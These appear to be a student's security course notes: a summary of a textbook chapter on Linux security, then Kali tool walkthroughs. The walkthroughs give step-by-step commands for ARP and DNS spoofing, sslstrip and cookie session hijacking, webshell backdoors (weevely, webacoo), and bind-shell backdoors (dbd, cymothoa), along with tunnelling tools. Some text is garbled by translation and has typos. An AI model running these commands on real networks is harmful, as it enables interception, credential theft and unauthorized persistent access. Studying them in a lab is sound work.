Experiment 1 Construction and testing of network attack and defense environment
Attacker and target can be pinged
Textbook Chapter 8 Learning
- Linux operating system development and status quo
On the basis of a unified kernel code base, the Linux open source community has also developed a large number of operating system distributions according to the needs of different user groups, the popular ones including Ubuntu, Debian, Fedora, CentOS, RHEL, OpenSUSE and Slackware et al. The reason why the Linux operating system has become one of the most concerned systems is that it is open source and free.
Linux has the following advantages: ① Cross-platform hardware support (most of the Linux operating system kernel is written in C language, and adopts the portable UNIX standard application program interface) ② Rich software support ③ Multi-user multi-tasking ( Multiple users can use the computer system online at the same time) ④Reliable security (using Linux's own firewall, intrusion detection and security authentication and other tools, and timely patching the system's loopholes, can greatly improve the security of the Linux system stability) ⑤Good stability (Linux kernel source code is optimized based on standard 32-bit (64-bit on 64-bit CPU) computer to ensure the stability of its system) ⑥Perfect Internet function.
Linux system structure: A complete operating system based on the Linux kernel is called the Linux operating system. The structure of the Linux operating system includes the Linux kernel, some GNU runtime libraries and tools, a command-line shell, a graphical interface X window system and the corresponding desktop environment, and includes Thousands of applications ranging from office packages, compilers, text editors, scientific tools to web services. The overall structure of the Linux operating system kernel belongs to a typical macro-kernel structure, not the micro-kernel structure adopted by Minix, the precursor of Linux. In the Linux kernel, all kinds of device drivers in the hardware abstraction layer can fully access the hardware devices, conveniently set up in a modular form, and can be loaded or unloaded directly through the LKM mechanism during system operation. Above the hardware abstraction layer is the kernel service function module, including five subsystems of process management, memory management, file system, device control and network; and these kernel modules pass the system call interface to the user-mode GNU runtime library, tools, and commands. Line Shell, X window and application software to provide services. - The core security mechanism of the Linux operating system
consists of three parts: identity authentication, authorization and access control, and security auditing.
Linux identity authentication mechanism: Linux is a multi-user and multi-task operating system. It implements user identity management by creating users and user groups of various role types to ensure that multiple users use the Linux operating system safely.
Linux user: In the Linux system, the user is used as the main body of the execution process to complete the specific operation task: ①Root user ②Ordinary user ③System user. Linux user information is stored in the /etc/password file of the system, including username, unique uid for each user, Shell type used, user initial directory, etc. The encrypted password is stored in the /etc/shadow file, only Readable to Root.
Linux user group: A Linux user group is actually a collection of user accounts with the same characteristics, which is used to simplify the user rights management of the entire system. The Linux user group information is stored in the /etc/group file of the system, including the user group name, the user group gid, and the list of user names included in the user group. The user group encrypted password is stored in the /etc/gshadow file. You can use the id-a command to query and display the groups to which the current user belongs, add user groups through the groupadd command, and use usermod-G group_name user name to add users to a specific group. - The main methods of invading Linux systems on remote networks
① Guessing and attacking the user passwords involved in the identity authentication process of various network services in the Linux system ② Discovering and exploiting the security loopholes of a monitoring network service in the Linux system, so as to provide attackers with Provide access to the local shell ③ Use web Trojans, send fraudulent emails, provide Trojan horse programs and other technical and social engineering methods When the server is used, it may be attacked by data packets specially constructed by the attacker, so that the attacker can obtain access rights.
Linux local privilege elevation: When root privileges are required to configure and manage the system, use the su or sudo command to elevate to the root user account. After an attacker gains access to a local limited user, the easiest way to escalate privileges is to crack the root user's password, and then execute the su or sudo command to escalate. Reading the password ciphertext file /etc/shadow itself requires the attacker to have Root privileges. By exploiting some arbitrary file read/write vulnerabilities in services running with Root privileges, an attacker can still obtain the /ect/shadow file first, and then escalate his authority to a root privileged user by cracking the password. The second way to escalate privileges is to discover and exploit security holes in the su or sudo program. The most popular way for attackers to escalate local privileges on Linux systems is to directly attack arbitrary code execution vulnerabilities in programs with root privileges, allowing them to open shell command-line connections with root privileges for the attacker. According to the type of the attacked target program, this kind of approach is divided into attacking user mode SUID privilege escalation vulnerability and attacking Linux kernel code privilege escalation vulnerability. Network services and programs with the SUID bit set in the user mode can be elevated to the permissions of the file during operation to perform some system resource-related operations. The last local privilege escalation technique takes advantage of some misconfiguration in the system. By searching the system for sensitive file and directory locations that are globally writable and exploiting them, an attacker with only the privileges of the first user may allow the operating system or privileged programs Do something they expect to gain an opportunity for privilege escalation.
Video learning summary
KaliSecurity - SET for exploits
Social Engineering Toolkit is an open source tool, a Python-driven social engineering penetration testing tool that provides a very rich attack vector library. It is an open source social engineering exploit kit that is usually used in conjunction with Metas.
1. Open the SET suite
command line and enter setoolkit
menu options 1 for social engineering attacks, 2 for Fast-Track penetration testing, and 3 for third-party modules
2. Menu option 1 is social engineering attack
. Enter 1 and press Enter, there are 11 modules 
:
spear phishing attack, website attack, media infection attack, payload creation and monitoring, mass email attack, Arduino-based attack , SMS spoofing attack, wireless access point attack, QR code attack, powershell attack, third-
party
modules 
, the corresponding payload can choose different vulnerabilities.
4. The website attack framework
continues to choose 2. The website attack framework 
opens a webServer service at this time. If the other party accesses this page, if there is a vulnerability triggering condition in the system, a backdoor will be implanted. For example, the Java Applet Attack method requires the target to have a Java runtime environment. For simulation, you can choose to build your own version or clone a website.
You can copy a website and hijack the domain name with the help of intranet sniffing and deception.
5. Media infection attack
Continue to choose 3 Media infection attack 
to execute Exploit with Autorun.inf to get a returned shell, or it can be combined with the backdoor of Metasploit.
6. Create payloads and listeners
Continue to select 4 to create payloads and listeners, similar to the payload given by Metasploit 
7. Mass email attacks
continue to select 5 Mass email attacks 
support importing lists and sending emails to everyone in the list
8. Based on Arduino
, it is mainly aimed at hardware attacks and is a hardware module.
9. SMS spoofing attacks
Forge short messages and send them to others, disguising the source of the SMS
10. Wireless access point attacks
Wireless access point attacks create a virtual wireless AP, through which all connected device traffic can be captured.
11. The QR code attack
fills in a dangerous URL, so that the attacker scans the QR code to automatically access the page. 
12. PowerShell attack
for Vista and above PowerShell attack module
13. Fast-Track attack module
KaliSecurity - Sniffing spoofing and man-in-the-middle attacks
The man-in-the-middle attack routine under Linux is the same. Here are the methods for ARP spoofing, DNS spoofing and sniffing, and session hijacking. 
1. Enable port forwarding for Kali settings
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 修改为12. To set ssltrip
to hijack SSL data, https data needs to be changed to http: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
let sslrtip listen on port 8081: sslstrip -l 8081
3. Preparation of
ettercap ettercap is a set of tools for man-in-the-middle attacks. As famous as the dsniff suite. Support plug-ins and filtering scripts, directly display account and password without manual data extraction. If it is the first man-in-the-middle attack operation, then configure the etteracp under kali.
The configuration file is /etc/ettercap/etter.conf, first of all, after changing both ec_uid and ec_gid to 0 
, you can directly open the modification and save it from the folder. 
Then find the line under the linux category if you use iptables, remove the comment ("#" sign), and turn on forwarding. 
Open the graphical interface and ettercap -G
select the default eth0 for the sniffing network card
4. Use Ettercap to
open ettercap, select sniff option-unified sniffing-select network card-hosts option: scan for hosts first, and select host list after scanning.
5, Dsniff suit introduction
Dsniff suit is mainly arpspoof and dsniff, the former is used for arp spoofing, the latter is used for sniffing. The attack steps are as follows:
Perform arp spoofing:
arpspoof [-i interface (network card)] [-c own|host|both (spoofing method, usually both)] [-t target (target)] [-r] host (gateway) )
to sniff:
dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression ]
-c opens a half-duplex TCP stream, allowing proper sniffing when using arpspoof;
-d enables debug mode;
-f loads triggers from a file in /etc/service format (that is, the service for password sniffing type);
-I use a specific network interface;
-m use the dsniff.magic file to try to automatically determine the protocol by the characteristics defined in the magic file;
-n do not perform a host lookup;
-r read from a previously saved session being sniffed sniffed data;
-s sniffs up to the first byte of the message, if the username and password information is included in the default 1024-byte boundary that follows;
-t uses the format port/proto=servise; to load a file that starts with a comma A defined set of triggers;
6. Session hijacking
Here we mainly use cookies as an example to illustrate the usage of session hijacking.
Start arp spoofing;
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
capture datagrams:
tcpdump -i wlan -w test.cap
Wait for a while, it is estimated that the target will log in to the website, we start to process the captured data packets:
forret - r test.cap
If there is no problem with the captured data packets, and it is determined that port forwarding is enabled, then the processed data packets will automatically generate hamster.txt and
then run hamster hamster
will prompt the browser to set the proxy to http://127.0.0.1 :1234
Then open hamster in the browser: http://hamster
Select the target and the possible login authentication address, and then click the link to find that the hijacking is successful.
7. Picture interception
Using Driftnet, we can see pictures of victims visiting websites.
First, still use arpspoof to start arp spoofing, and then start driftnet:
driftent -i
At this time, a small window will pop up. When the target visits a website with pictures, the attacker can see it in this small window.
8. DNS spoofing
Using the dnsspoof in the Dsniff suite or the dnsspoof plug-in of ettercap, we can complete the dns spoofing of the victim.
Before we start cheating, first we need to edit a own hosts file and put it in a place that is easily accessible. The content is similar to the content of the hosts that come with the machine, just write the domain name you want to deceive and the address where you want to deceive (usually the server designated by the attacker to perform browser overflow or java applet attacks, to Obtain the victim's computer access rights)
host file: 127.0.0.1 www.baidu.com
The above is an example of a hosts file, which directs Baidu to this machine. We save it as hosts, located in the /root directory.
Then start dnsspoof: dnsspoof -i wlan0 -f /root/hosts
and other victims visit Baidu to observe the effect.
9. URL monitoring
Using the urlsnarf tool in the Dsniff package, we parse the HTTP communication of TCP80, 3128, and 8080 ports, and can dump all sniffed HTTP requests into a common log format (Common Log Format, CLF), This format is used by many web servers, such as IIS and Apache, and it is very convenient to use some log analysis tools to analyze and record the results afterwards.
Usage: urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
10. Download software monitoring
Using the filesnarf tool in the Dsniff suite, we can select a file from the sniffed NFS communication and dump it to the local current working directory.
Ussage: filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]
KaliSecurity - Permission Maintenance Backdoor
Permission maintenance includes three subclasses of Tunnel toolset, Web backdoor, and system backdoor. The system backdoor and the web backdoor are collectively referred to as backdoors, which are malicious programs left behind to facilitate re-entry into the system after penetration testing.
1. WEB backdoor
(1) Weevely 
Weevely is a webshell tool written in python (integrating webshell generation and connection, only for safe learning and teaching, and prohibiting illegal use), which can be regarded as a kitchen knife under linux Alternative tools (limited to php), some modules are not available on win.
Generate a php backdoor, weevely generate test ~/1.php, test is the password, and generate ~/1.php locally
Upload the backdoor to the web, use the weevely connection to
open Metasploitable2
nano 1.php and copy the generated file content to it
weevely http://192.168.75.132/1.php
(2) WeBaCoo (Web Backdoor Cookie) script-kit
is a small, hidden The php backdoor, which provides a terminal that can connect to a remote web server and execute php code. WebaCoo uses HTTP response headers to transmit command results, and shell commands are base64 encoded and hidden in cookies. Generate a webshell:
After uploading to the website, use webacoo to connect:
webacoo -t -u http://192.168.75.132/2.php
By adding: Execute the local command, if not, use the webshell to execute the command.
2. System backdoor
(1) Cymothoa system backdoor
cymothoa -10500 -s -0 -y 2333 (injecting port 2333), if successful, you can connect to port 2333 and return a shell
(2) dbd is understood as the encrypted version of the nc
listening end: dbd -l -p 2333 -e /bin/bash -k password
Attacker: dbd 127.0.0.1 2333 -k password
(3) The usage of sbd and dbd is the same
(6) U3-Pwn
is a tool used in combination with Metasploit Payload, the menu can be single-handedly Mostly for mobile optical drive devices such as optical drive mirroring, U disk, etc.
(7) Intersect
executes the backdoor and executes 1.py -b on the target machine to generate a bind shell backdoor. If the remote host and remote port are set before, they can also be set to reverse shell. At this time, the connection to the backdoor port is successful and returns to the shell .
Tunnel for Kali Privilege Maintenance
Permission maintenance includes three subclasses of Tunnel toolset, web backdoor, and system backdoor. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies:
1. CryptCat
Netcat is known as the Swiss Army Knife in network tools, but the tunnel it establishes itself is not encrypted, so there is cryptcat. Similar to using dbd/sbd.
2. DNS2TCP
DNS tunnel is DNS tunnel. From the name point of view, it uses the DNS query process to establish a tunnel to transmit data.
In public places such as hotels, there is usually a wifi signal, but when you visit the first website, a window may pop up, you need to enter the user name and password, and then you can continue to surf the Internet after logging in (this technology is generally a transparent http proxy). However, sometimes it is found that the obtained dns address is valid and can be used for dns query. At this time, DNS tunnel technology can be used to achieve free Internet access.
DNS tunnel principle: Through a specific server, let the DNS server in the local area network realize data forwarding for us. There are many tools implemented by DNS tunnel, such as: OzymanDNS, tcp-over-dns, heyoks, iodine, dns2tcp
3, Iodine
4, Miredo
Miredo is a network tool, mainly used for IPV6 Teredo tunnel conversion of BSD and Linux. To support IPV6 network connection IPV6, the kernel needs to have IPV6 and TUN tunnel support.
5.
A tool is often used in Proxychains intranet penetration testing. For example, we use Meterpreter to open a Socks4a proxy service. By modifying the
/etc/prosychains.conf configuration file and adding a proxy, other tools such as sqlmap and lamp can be used directly. The proxy scans the intranet.
Such as proxychain namp 10.0.0.1/24
6. Proxytunnel
Proxytunnel can connect to remote servers through standard Https proxy, which is a proxy that realizes the function of bridging. Specifically for Http(s) transport over SSH
Prosytunnel can be used to:
Use http(s) proxy (http connect command) to create a communication channel
Write a client driver for OpwnSSH, and create an http(s) proxy based on SSH connection
as an independent application that can connect to remote servers
7. Ptunnel
uses ICMP data Packet establishment tunnel communication
8, Pwant
intranet through UDP communication
9, sslh is
a ssl/ssh port multiplexing tool, sslh can accept https, ssh and openvpn connections on the same port. This makes it possible to connect to ssh server or openvpn server through port 443 and provide https service on this port. sslh can be used as an example to study port multiplexing.
Kali reverse engineering tool
Reverse engineering is to deduce a specific implementation method through analysis based on existing things and results. For example, seeing someone else's exe program can make some kind of beautiful animation effect, you can analyze the realization process of its animation effect through methods such as disassembly, decompilation and dynamic tracking. This behavior is reverse engineering; not only Is to decompile, but also to pull out the design, and document, the purpose of reverse software engineering is to make the software maintainable.
1. Edb-Debugger
EDB (Evan's Debugger) is a binary debugging tool developed based on Qt4, mainly to be in line with the OllyDbg tool. The function can be expanded through the plug-in system. Currently, only Linux is supported.
2. Ollydbg
's classic Ring3-level debugger is a dynamic debugging tool that combines IDA with SoftICE. Under Kali is Ollydbg running in Wine mode.
3. jad
4, Redare2
5, Recstudio2
6, Apktool